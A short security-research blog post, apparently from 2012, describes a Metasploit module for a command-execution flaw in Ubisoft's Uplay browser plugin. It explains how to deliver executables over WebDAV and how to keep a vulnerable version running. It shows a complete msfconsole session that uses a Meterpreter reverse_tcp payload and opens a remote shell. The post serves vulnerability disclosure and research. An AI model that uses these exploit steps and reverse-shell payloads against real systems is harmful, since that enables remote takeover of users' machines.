Its a very simple exploit, as it just takes the path to an exe and loads it for you, no memory corruption to worry about. Our initial attempt would just run any local executable, and whilst developing this Ubisoft pushed out a very swift patch to prevent this flaw.
Its still possible to use the old installer for 2.03, disconnect from the internet to prevent the update process, login, and set uplay into offline mode to prevent further updates. This also means there might be a few souls out there still running vulnerable versions but they will be few and far between.
It did not work in Windows 7 but happily in Windows XP. Not sure why this is but nevermind. Tested it in IE should theoretically work in other browsers but they generally did not have the plugin registered.
Further feedback from Rapid7's Sinn3r suggested using WebDAV to deliver the payload rather than limiting to just local files, so I butchered webdav_dll_hijacker.rb to serve exes. Had a few problems in that when requesting the exe it would then try and request xxx.exe.Manifest and DLLs corrupting the executable, but with a helpful hint from HDM to serve these with a 404 request it was off and running:
_ _ / \ / \ __ _ __ /_/ __ | |\ / | _____ \ \ ___ _____ | | / \ _ \ \ | | \/| | | ___\ |- -| /\ / __\ | -__/ | | | | || | |- -| |_| | | | _|__ | |_ / -\ __\ \ | | | |_ \__/ | | | |_ |/ |____/ \___\/ /\ \___/ \/ \__| |_\ \___\ =[ metasploit v4.4.0-release [core:4.4 api:1.0] + -- --=[ 917 exploits - 495 auxiliary - 150 post + -- --=[ 250 payloads - 28 encoders - 8 nops msf > use exploit/windows/browser/ubisoft_uplay_cmd_exec msf exploit(ubisoft_uplay_cmd_exec) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(ubisoft_uplay_cmd_exec) > set LHOST 192.168.1.45 LHOST => 192.168.1.45 msf exploit(ubisoft_uplay_cmd_exec) > exploit [*] Exploit running as background job. msf exploit(ubisoft_uplay_cmd_exec) > [*] Started reverse handler on 192.168.1.45:4444 [*] Exploit URI: http://192.168.1.45:80/kcomPoOs [*] Using URL: http://0.0.0.0:80/ [*] Local IP: http://192.168.1.45:80/ [*] Server started. [*] 192.168.1.45 ubisoft_uplay_cmd_exec - GET => Exploit [*] 192.168.1.45 ubisoft_uplay_cmd_exec - GET => Payload [*] Sending stage (752128 bytes) to 192.168.1.45 [*] Meterpreter session 1 opened (192.168.1.45:4444 -> 192.168.1.45:3762) at 2012-07-31 20:45:15 +0100
Hopefully be included in the main trunk but unlikely to get any real world shells with it due to Ubisoft's swift turnaround! https://github.com/rapid7/metasploit-framework/pull/653